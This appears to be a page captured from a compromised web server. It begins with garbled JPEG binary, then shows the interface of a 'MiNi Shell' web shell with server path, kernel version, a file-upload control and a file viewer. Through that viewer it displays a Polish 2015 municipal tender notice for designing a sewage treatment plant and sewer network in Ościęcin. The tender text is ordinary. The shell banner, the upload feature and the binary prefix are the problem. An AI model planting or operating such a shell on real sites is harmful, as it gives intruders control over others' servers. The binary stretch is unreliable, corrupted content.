JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150916/242226-N-2015.html

<p class="kh_header"><b>Gryfice: Usługa projektowa polegająca na uporządkowaniu zrzutu ścieków bytowo-gospodarczych                               z miejscowości Ościęcin gm. Gryfice, z podziałem na fazy realizacji, wykonywana  w ramach zadania inwestycyjnego Gminy Gryfice pn. Opracowanie dokumentacji na budowę oczyszczalni              i kanalizacji w Ościęcinie</b><br>
<b>Numer ogłoszenia: 242226 - 2015; data zamieszczenia: 16.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych w Gryficach , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 91 3842047, faks 91 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.zgk.gryfice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa projektowa polegająca na uporządkowaniu zrzutu ścieków bytowo-gospodarczych                               z miejscowości Ościęcin gm. Gryfice, z podziałem na fazy realizacji, wykonywana  w ramach zadania inwestycyjnego Gminy Gryfice pn. Opracowanie dokumentacji na budowę oczyszczalni              i kanalizacji w Ościęcinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie będzie przebiegać w dwóch fazach:
Faza 1 - działanie w etapie I.
Etap I: 
1. opracowanie koncepcji programowo-przestrzennej (KPP) lokalizacji oczyszczalni i budowy 
    kanalizacji w miejscowości Ościęcin gm. Gryfice;
2. na podstawie KPP opracowanie wskaźnikowych kosztów inwestycji (WKI)                                  
    oraz wskaźnikowych rocznych kosztów eksploatacji (WKE) oczyszczalni ścieków i sieci.
3. Celem zdefiniowania warunków posadowienia obiektów oczyszczalni i urządzeń 
    kanalizacyjnych, w zakresie przedmiotu zamówienia należy uwzględnić zlecenie                              
    i przygotowanie dokumentacji geotechnicznej. Ilość odwiertów o głębokości od 4 do 8 m 
    będzie uzależniona od ilości miejsc posadowienia przepompowni oraz ilości i lokalizacji  
    urządzeń ciągu technologicznego oczyszczalni ścieków. Badania geotechniczne w terenie  
    służące ustaleniu warunków posadowienia projektowanych urządzeń oczyszczalni ścieków 
    oraz opracowanie wyników w formie opinii, należy wykonać zgodnie z Rozporządzeniem 
    Ministra Transportu, Budownictwa  i Gospodarki Morskiej z dnia 25 kwietnia 2012 r.                 
    w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych 
    (Dz. U. z 2012 r. poz. 463). 
Koncepcja programowo-przestrzenna lokalizacji oczyszczalni i budowy kanalizacji                                 w miejscowości Ościęcin powinna obejmować:
a) inwentaryzację istniejącego systemu i istniejących sieci odprowadzania ścieków bytowo-
    gospodarczych m. Ościęcin, wykonaną w oparciu o mapę zasadniczą terenu i wywiad                   
    w terenie z użytkownikami zrzucającymi ścieki do zbiorników bezodpływowych,                       
    ze wskazaniem na mapie lokalizacji tych odbiorników;
b) przebieg rurociągów, usytuowanie przepompowni ścieków oraz oczyszczalni ścieków;
c) zestawienie ilości ścieków;
d) dobór oczyszczalni w uzgodnieniu z przyszłym użytkownikiem;
e) rozwiązanie sytuacyjno-wysokościowe kanałów grawitacyjnych i rurociągów tłocznych;
f) dobór parametrów technicznych pompowni i rurociągów tłocznych;
g) przebieg rurociągu przyłącza wodociągowego do oczyszczalni ścieków, którego warunki 
    wykonania, na etapie opracowania KPP, należy uzgodnić z Wodociągami 
    Zachodniopomorskimi w Goleniowie (patrz: UWAGA 2)
h) etapowanie inwestycji;
i) obliczenie szacunkowych kosztów realizacji inwestycji wraz z wyliczeniem przyszłych 
    kosztów eksploatacji kanalizacji i obiektów oraz kosztów oczyszczenia 1 m3 ścieków, 
    wyliczonych zgodnie z zasadami wykonania KPP i przyjętymi co najmniej dwoma 
    wariantami kosztu realizacji inwestycji oraz późniejszej jej eksploatacji.
UWAGA: Przebieg rurociągów, usytuowanie przepompowni ścieków oraz oczyszczalni ścieków powinny w pierwszej kolejności uwzględniać tereny stanowiące własność Gminy Gryfice,                            a w przypadku braku możliwości ustalenia trasy kanalizacji oraz lokalizacji obiektów z nią związanych na działkach gminnych - w dalszej kolejności - obejmować tereny należące                            do podmiotów publicznych. W ostateczności, jeżeli całego przebiegu rurociągów lub usytuowania przepompowni ścieków z przyczyn obiektywnych, nie da się ustalić na gruntach publicznych,             przed przystąpieniem do opracowania KPP należy to zgłosić Zamawiającemu.  Zamawiający zastrzega sobie prawo do wcześniejszego uzgodnienia przebiegu  trasy lub wyboru wariantu trasy zaproponowanej przez Wykonawcę w opracowywanej koncepcji.
Poza czynnościami wymienionymi powyżej, do obowiązków Wykonawcy należy:
1) sprawdzenie w terenie warunków wykonania zamówienia.
2) zakup w Wojewódzkim Ośrodku Dokumentacji Geodezyjnej i Kartograficznej                               
    w Szczecinie, ul. Mickiewicza 41, 70-383 Szczecin, mapy topograficznej w skali 1:10000  
    w formie kopii kserograficznej i pliku rastrowego, obejmującej miejscowość Ościęcin                
    gm. Gryfice.
3) zakup w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej                               
    w Gryficach, ul. Dworcowa 23, 72-300 Gryfice, mapy sytuacyjno-wysokościowej w skali 
    1:1000 oraz mapy ewidencyjnej gruntów w skali 1:5000 w formie kopii kserograficznych              
     i plików rastrowych, obejmujących miejscowość Ościęcin gm. Gryfice.
4) w przypadku ustalenia projektowanej trasy przebiegu rurociągów i projektowanej 
     lokalizacji oczyszczalni ścieków wraz z wylotem ścieków oczyszczonych do odbiornika, 
     aktualizacja mapy zasadniczej terenu do potrzeb opracowywanej koncepcji.
UWAGA: Zamawiający informuje, że dla określenia stanu formalno-prawnego nieruchomości gruntowych, nie ma potrzeby zakupu wypisów z rejestru ewidencji gruntów w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Gryficach, ul. Dworcowa 23, 72-300 Gryfice - ustalenie właścicieli nastąpi na podstawie danych Urzędu Miejskiego w Gryficach nieodpłatnie, za pośrednictwem Zamawiającego, na wniosek Wykonawcy skierowany                            do Zamawiającego.
Ponadto Zamawiający informuje, że nie posiada wstępnych uzgodnień dotyczących lokalizacji oczyszczalni ścieków. Ostateczna lokalizacja oczyszczalni ścieków będzie wynikała z analizy koncepcji programowo-przestrzennej.
Zamawiający nie posiada wstępnych uzgodnień lokalizacji sieci w drogach z obecnymi 
właścicielami/zarządcami. Miejscowość Ościęcin jest położona przy drodze powiatowej 1037Z (Unibórz [granica powiatu] - Ościęcin - Kołomąć - Gryfice) w gestii Zarządu Dróg Powiatowych           w Gryficach, ul. Marszałka Józefa Piłsudskiego 18, 72-300 Gryfice. 
Ewentualne przekroczenia kanalizacji (przeszkód terenowych), takich jak cieki, inne sieci, itp.,   będą wynikać z koncepcji programowo-przestrzennej. Obowiązkiem Wykonawcy jest szczegółowe sprawdzenie w terenie warunków wykonania zamówienia.
Dla terenu objętego zamówieniem nie ma miejscowego planu zagospodarowania.
Na terenie objętym inwestycją nie występują formy ochrony przyrody.
Teren, na którym ma być zaprojektowana inwestycja, nie znajduje się w obszarze 
Natura 2000.
Miejscowość Ościęcin nie znajduje się na terenie rezerwatów, parków narodowych                                        i krajobrazowych.
UWARUNKOWANIA ROZPOCZĘCIA 2. FAZY ZAMÓWIENIA
W Fazie 1 - po przedstawieniu przez Wykonawcę koncepcji programowo - przestrzennej kanalizacji (KPP), Zamawiający dokona jej analizy i podejmie decyzję co do dalszych prac projektowych. Zamawiający zastrzega sobie prawo rezygnacji z realizacji drugiej fazy 
zlecenia, tzn. wykonania projektów budowlanych i wykonawczych kanalizacji, dokumentacji kosztorysowej i specyfikacji technicznych wykonania i odbioru robót, wraz z uzyskaniem pozwoleń na budowę, w przypadku nieprzyznania środków finansowych na ten cel. Decyzja będzie podjęta             w ciągu 30 dni od daty ostatecznego zaakceptowania przedłożonej do sprawdzenia Zamawiającemu KPP. Zamawiający dokona weryfikacji ww. koncepcji lub wprowadzi do niej uwagi w terminie               10 dni roboczych od dnia wyznaczonego na złożenie opracowania celem odbioru. W przypadku uwag wymagających wniesienia poprawek lub uzupełnień, Wykonawca dokona odpowiednich korekt i przekaże Zamawiającemu poprawione opracowanie w terminie 10 dni roboczych od dnia,  w którym otrzyma od Zamawiającego wiadomość o potrzebie wprowadzenia korekt, wysłaną faksem lub drogą elektroniczną. Okres pomiędzy datą złożenia KPP do odbioru a datą przekazania Wykonawcy informacji o akceptacji opracowania lub potrzebie wprowadzenia korekt do KPP zostanie wyłączony z naliczania kar umownych za zwłokę. Nie zostanie wyłączony z naliczania kar umownych za zwłokę okres pomiędzy datą przekazania Wykonawcy informacji o potrzebie wprowadzenia korekt do KPP a terminem wyznaczonym na dokonanie korekt w opracowaniu                     i przekazaniu Zamawiającemu poprawionego opracowania. W przypadku zwłoki Wykonawcy                 w dotrzymaniu terminu wyznaczonego na dokonanie korekt w opracowaniu i przekazaniu Zamawiającemu poprawionego opracowania, Zamawiający naliczy dodatkowo karę umowną                  za okres od daty ostatecznego zaakceptowania KPP do dnia uzyskania przez Zamawiającego decyzji o kontynuowaniu zamówienia. Kiedy zapadnie decyzja o zaniechaniu kontynuowania zamówienia, dodatkowa kara umowna nie będzie naliczana.
W przypadku decyzji o odstąpieniu od kontynuowania całego zamówienia, Wykonawcy przysługuje wyłącznie wynagrodzenie ofertowe za wykonanie 1. fazy zamówienia. W przypadku naliczenia kar umownych za zwłokę w dotrzymaniu ww. terminów, Zamawiający potrąci należności z tego tytułu  z wynagrodzenia za wykonanie 1. fazy zamówienia.  Wykonawcy nie przysługują żadne roszczenia z tytułu zaniechania przez Zamawiającego realizacji 2. fazy zamówienia.       
W przypadku decyzji o kontynuowaniu całego zamówienia, nastąpi przejście do 2. fazy zamówienia.
Etap II: 
obejmuje zaprojektowanie oczyszczalni w miejscu wskazanym w KPP  oraz sieci kanalizacji sanitarnej z urządzeniami i przykanalikami wzdłuż trasy określonej w KPP,  umożliwiające podłączenie części mieszkańców Ościęcina, korzystających dotychczas z oczyszczalni zakładu przetwórstwa mięsnego w upadłości likwidacyjnej, do nowo projektowanej oczyszczalni ścieków, wraz z uzyskaniem  pozwolenia na budowę. 
W skład tego działania wchodzą wszelkie badania, opracowania, uzgodnienia, opinie, wnioski                do ich uzyskania oraz decyzje administracyjne wraz ze wszystkimi kosztami ich uzyskania,                           w szczególności:
A. Zlecenie i uzyskanie mapy do celów projektowych w wersji elektronicznej (rastrowej                      
     lub wektorowej)  wraz z kartą rejestracyjną w PODGiK w Gryficach, obejmującej zakres 
     inwestycji w tym etapie.
B. Wystąpienie z wnioskiem do Wojewódzkiego Inspektoratu Ochrony Środowiska w Szczecinie, 
     ul. Wały Chrobrego 4, 70-502 Szczecin, o udzielenie informacji dotyczącej aktualnych wyników 
     badań ścieków oczyszczonych i surowych przetwarzanych przez oczyszczalnię ścieków należącą 
     do Zakładu Przetwórstwa Mięsnego Izabela i Zbigniew Grabowscy w upadłości likwidacyjnej              
     w Ościęcinie, w celu umożliwienia doboru parametrów technicznych projektowanej 
     oczyszczalni.
     UWAGA: Zamawiający wskazuje, że opisowe dane dotyczące istniejącej oczyszczalni 
     ścieków w Ościęcinie zostały opublikowane na stronie 41. opracowania WIOŚ w Szczecinie, 
     zamieszczonego w internecie, na stronie o adresie:       
     http://www.wios.szczecin.pl/bip/files/6FB5CB28B8EA4D3298D1102B47B58790/gryfice.pdf 
C. Opracowanie Karty Informacyjnej Przedsięwzięcia lub Raportu o Oddziaływaniu na Środowisko 
     (o ile na etapie składania wniosku o  wydanie decyzji o środowiskowych uwarunkowaniach 
     zgody na realizację przedsięwzięcia zajdzie potrzeba sporządzenia raportu).
D. Opracowanie operatów wodnoprawnych na odprowadzenie ścieków do odbiornika                          
i na budowę urządzeń wodnych (projektowany wylot ścieków oczyszczonych).
E. Sporządzenie, złożenie w odpowiednich instytucjach i uzyskanie warunków technicznych 
przyłączenia do tych mediów, które są niezbędne do kompletnego wykonania przedmiotu 
zamówienia. 
     UWAGA 1: do zasilenia projektowanego obiektu w energię elektryczną będzie konieczne   
     zaprojektowanie i wykonanie nowego przyłącza elektroenergetycznego, które należy zlecić  
     operatorowi sieci elektroenergetycznej. Zlecającym usługę wykonania i zaprojektowania będzie  
     Zamawiający. Wykonawca pobierze ze strony internetowej operatora formularz odpowiedniego 
     wniosku o określenie warunków przyłączenia do sieci operatora,  który wypełni, a także 
     sporządzi w dwóch egzemplarzach plan zabudowy lub szkic sytuacyjny określający usytuowanie 
     przyłączanego obiektu względem istniejącej sieci oraz usytuowanie sąsiednich obiektów.                       
     Po otrzymaniu ww. materiałów od Wykonawcy, Zamawiający skompletuje wniosek, złoży                          
     i odbierze z biura obsługi klienta operatora sieci elektroenergetycznej, niezwłocznie przesyłając  
     Wykonawcy oryginał warunków. Zamawiający poniesie koszt uzyskania warunków  
     technicznych i sfinansowania opracowania projektu przyłącza przez operatora.                          
     UWAGA 2: zarządcą istniejącego ujęcia wody, sieci wodociągowej i kanalizacyjnej                               
     w m. Ościęcin są Wodociągi Zachodniopomorskie Spółka z o. o., ul. I Brygady Legionów 8-10,  
     72-100 Goleniów. Wykonawca wystąpi z wnioskiem o wydanie i uzyska od zarządcy sieci 
     wodociągowej warunki techniczne włączenia projektowanej oczyszczalni ścieków do sieci 
     wodociągowej.     
F. Opracowanie kompletnych projektów budowlanych i wykonawczych, w zakresie i formie 
     zgodnej z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia  
     25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego                        
     (Dz. U. z 2012 r. poz. 462 ze zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia                         
     2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, 
     specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-
     użytkowego (tekst jedn. Dz. U. z 2013 r. poz. 1129), w zakresie niezbędnym do prawidłowego 
     zrealizowania robót i uruchomienia obiektu na podstawie tych projektów.
     Przez sformułowanie kompletne projekty budowlane i wykonawcze Zamawiający rozumie:                       
     - opracowanie projektu budowlanego, służącego uzyskaniu decyzji o pozwoleniu na budowę, 
        obejmującego wszystkie branże wraz z zagospodarowaniem terenu i projektem 
        architektoniczno-budowlanym oczyszczalni, wylotem ścieków oczyszczonych do odbiornika, 
        siecią kanalizacji sanitarnej z przykanalikami dla użytkowników dotychczas przyłączonych             
        do istniejącej oczyszczalni, projektem zasilania elektroenergetycznego przepompowni ścieków 
        oraz przyłączem wodociągowym do oczyszczalni i instalacją elektroenergetyczną od szafy 
        złącza kablowego operatora do szafy rozdzielni na terenie oczyszczalni po stronie odbiorcy. 
     - opracowanie projektów wykonawczych w stopniu szczegółowości umożliwiającym prawidłowe 
        wykonanie, uruchomienie oraz umożliwienie uzyskania po wykonaniu zgodnie z projektem 
        założonych parametrów oczyszczania ścieków przez wybudowane i zamontowane obiekty                 
        i urządzenia oczyszczalni w branżach: instalacyjno-technologicznej, konstrukcyjnej, 
        elektrycznej, drogowej, automatyki, telekomunikacji, a także w branżach nie wymienionych 
        wyżej, lecz koniecznych do prawidłowego wykonania i uruchomienia obiektów; opracowanie 
        projektu budowy wylotu ścieków z oczyszczalni  do odbiornika zgodnie z warunkami 
        pozwolenia wodno prawnego; zapewnienie odbioru i przesyłu ścieków zaprojektowaną siecią 
        w sposób bezkolizyjny z innymi obiektami istniejącego uzbrojenia terenu, zaprojektowanie 
        zasilania elektroenergetycznego przepompowni ścieków po uzgodnieniu z operatorem sieci,                 
        oraz przyjęcie rozwiązań materiałowych i technologicznych zapewniających w tym zakresie 
        neutralny wpływ inwestycji na środowisko.
G. Opracowanie specyfikacji technicznych wykonania i odbioru robót dla branż objętych 
     poszczególnymi opracowaniami projektowymi.
H. Sporządzenie kosztorysów inwestorskich dla branż objętych poszczególnymi opracowaniami 
     projektowymi, wykonanych metodą kalkulacji uproszczonej zgodnie z Rozporządzeniem 
     Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. nr 130, poz. 1389).
     UWAGA: W ramach niniejszego przedmiotu zamówienia Wykonawca dokona dwóch przecen 
     wszystkich opracowanych kosztorysów inwestorskich pomiędzy datą upływu terminu 6 miesięcy 
     od daty sporządzenia najwcześniej wykonanego kosztorysu, a przed:
     1. terminem  wszczęcia postępowania w sprawie dofinansowania inwestycji realizowanej                        
         na podstawie opracowanej przez Wykonawcę dokumentacji projektowej;
     2. terminem wszczęcia postępowania o udzielenie zamówienia na roboty budowlane realizowane 
         na podstawie tej dokumentacji.
         Każda z przecen wszystkich kosztorysów zostanie przeprowadzona po uprzednim zgłoszeniu 
         Wykonawcy potrzeby wykonania danej przeceny, w terminie 14 dni od daty otrzymania              
         przez Wykonawcę pisemnego zgłoszenia Zamawiającego.      
I. Sporządzenie przedmiarów robót dla branż objętych poszczególnymi opracowaniami
    projektowymi w rozumieniu definicji z Rozporządzenia Ministra Infrastruktury z dnia 2 września 
    2004 r. (Dz. U. nr 202, poz. 2072 ze zm.).
J. Opracowanie instrukcji eksploatacji oczyszczalni.
K. Udostępnienie Zamawiającemu instrukcji eksploatacji przepompowni ścieków.
Poza opracowaniami merytorycznymi do przedmiotu zamówienia należy sporządzenie, złożenie             do odpowiednich instytucji kompletnych wniosków o wydanie i odbiór decyzji:
a) o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia;
b) o ustaleniu lokalizacji inwestycji celu publicznego;
c) o udzieleniu pozwolenia wodnoprawnego na wprowadzenie ścieków oczyszczonych                      do odbiornika oraz udział w rozprawie;
d) o udzieleniu pozwolenia wodnoprawnego na wykonanie wylotu ścieków oczyszczonych                         
     z projektowanej oczyszczalni oraz udział w rozprawie;
e) o udzieleniu pozwolenia na budowę. 
UWAGA: Jeżeli na podstawie  opracowanej koncepcji Wykonawca wskazał działki gminne                    lub inne, co do których na podstawie ustawy z dnia 3 lutego 1995 r. o ochronie gruntów rolnych                 i leśnych (tekst jedn. Dz. U. z 2013 r. poz. 1205 z późn. zm.) zachodzi konieczność wyłączenia ich  z produkcji rolniczej, to przeprowadzi on w imieniu Zamawiającego procedurę zgodną                                 z ww. ustawą.
Przez przeprowadzenie procedury zgodnej z ustawą o ochronie gruntów rolnych i leśnych Zamawiający rozumie:
1) ustalenie pochodzenia gleb znajdujących się na terenie działek planowanych pod inwestycję;
2) w zależności od wyniku ustalenia pochodzenia gleb jw., zredagowanie, złożenie wniosku                      
    o wydanie decyzji zezwalającej na takie wyłączenie wspólnie z Zamawiającym i odbiór decyzji 
    ze Starostwa Powiatowego w Gryficach.
Ustalenie pochodzenia gleb znajdujących się na terenie działek planowanych pod inwestycję nastąpi po zleceniu przez Wykonawcę i otrzymaniu opinii gleboznawczej, sporządzonej w dwóch egzemplarzach przez klasyfikatora gruntów z listy Starostwa Powiatowego w Gryficach.
Koszt przeprowadzenia procedury wyłączenia gruntów z produkcji rolniczej Wykonawca uwzględni w cenie oferty.  
Wszelkie opracowania analityczne, projektowe, kosztowe i specyfikacje jakościowe, objęte przedmiotem zamówienia, powinny być wykonane w zgodności z przepisami prawa,                                         a w szczególności z:
- ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2013 r. 
  poz. 1232 ze zm.),
- ustawą z dnia 18 lipca 2001 r. Prawo wodne (tekst jedn. Dz. U. z 2015 r. poz. 469 ze zm.),
- ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r. poz. 1409 ze zm.),
- ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r. 
   poz. 907 ze zm.),
- odnośnymi przepisami wykonawczymi do tych ustaw. 
Etap III:
obejmuje zaprojektowanie sieci kanalizacji sanitarnej z urządzeniami i przykanalikami wzdłuż trasy określonej w KPP, umożliwiające zrzut ścieków pozostałej części mieszkańców miejscowości Ościęcin, do oczyszczalni zaprojektowanej w etapie II, wraz z uzyskaniem pozwolenia na budowę.
W skład tego działania wchodzą wszelkie badania, opracowania, uzgodnienia, opinie, wnioski                 do ich uzyskania oraz decyzje administracyjne wraz ze wszystkimi kosztami ich uzyskania,                       w szczególności:
A. Zlecenie i uzyskanie mapy do celów projektowych w wersji elektronicznej (rastrowej                        
     lub wektorowej)  wraz z kartą rejestracyjną w PODGiK w Gryficach, obejmującej zakres 
     inwestycji w tym etapie.
B. Opracowanie Karty Informacyjnej Przedsięwzięcia lub Raportu o Oddziaływaniu na Środowisko 
     (o ile na etapie składania wniosku o  wydanie decyzji o środowiskowych uwarunkowaniach 
     zgody na realizację przedsięwzięcia zajdzie potrzeba sporządzenia raportu).
C. Opracowanie kompletnych projektów budowlanych i wykonawczych, w zakresie i formie 
     zgodnej z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia  
     25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego                        
     (Dz. U. z 2012 r. poz. 462 ze zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia                        
     2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, 
     specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-
     użytkowego (tekst jedn. Dz. U. z 2013 r. poz. 1129), w zakresie niezbędnym do prawidłowego 
     zrealizowania robót i uruchomienia obiektu na podstawie tych projektów.
     Przez sformułowanie kompletne projekty budowlane i wykonawcze Zamawiający rozumie:                       
     - opracowanie projektu budowlanego, służącego uzyskaniu decyzji o pozwoleniu na budowę, 
        obejmującego sieć kanalizacji sanitarnej z przykanalikami dla użytkowników dotychczas                
        nieprzyłączonych do istniejącej oczyszczalni ścieków. 
     - opracowanie projektów wykonawczych w stopniu szczegółowości umożliwiającym prawidłowe 
        wykonanie, uruchomienie oraz zapewnienie odbioru i przesyłu ścieków zaprojektowaną siecią 
        w sposób bezkolizyjny z innymi obiektami istniejącego uzbrojenia terenu, zaprojektowanie 
        zasilania elektroenergetycznego przepompowni ścieków po uzgodnieniu z operatorem sieci, 
        oraz przyjęcie rozwiązań materiałowych i technologicznych, zapewniających w tym zakresie 
        neutralny wpływ inwestycji na środowisko.
D. Opracowanie specyfikacji technicznych wykonania i odbioru robót dla branż objętych 
     poszczególnymi opracowaniami projektowymi.
E. Sporządzenie kosztorysów inwestorskich dla branż objętych poszczególnymi opracowaniami 
     projektowymi, wykonanych metodą kalkulacji uproszczonej zgodnie z Rozporządzeniem 
     Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. nr 130, poz. 1389).
     UWAGA: W ramach niniejszego przedmiotu zamówienia Wykonawca dokona dwóch przecen 
     wszystkich opracowanych kosztorysów inwestorskich pomiędzy datą upływu terminu 6 miesięcy 
     od daty sporządzenia najwcześniej wykonanego kosztorysu, a przed:
     1. terminem  wszczęcia postępowania w sprawie dofinansowania inwestycji realizowanej                        
         na podstawie opracowanej przez Wykonawcę dokumentacji projektowej;
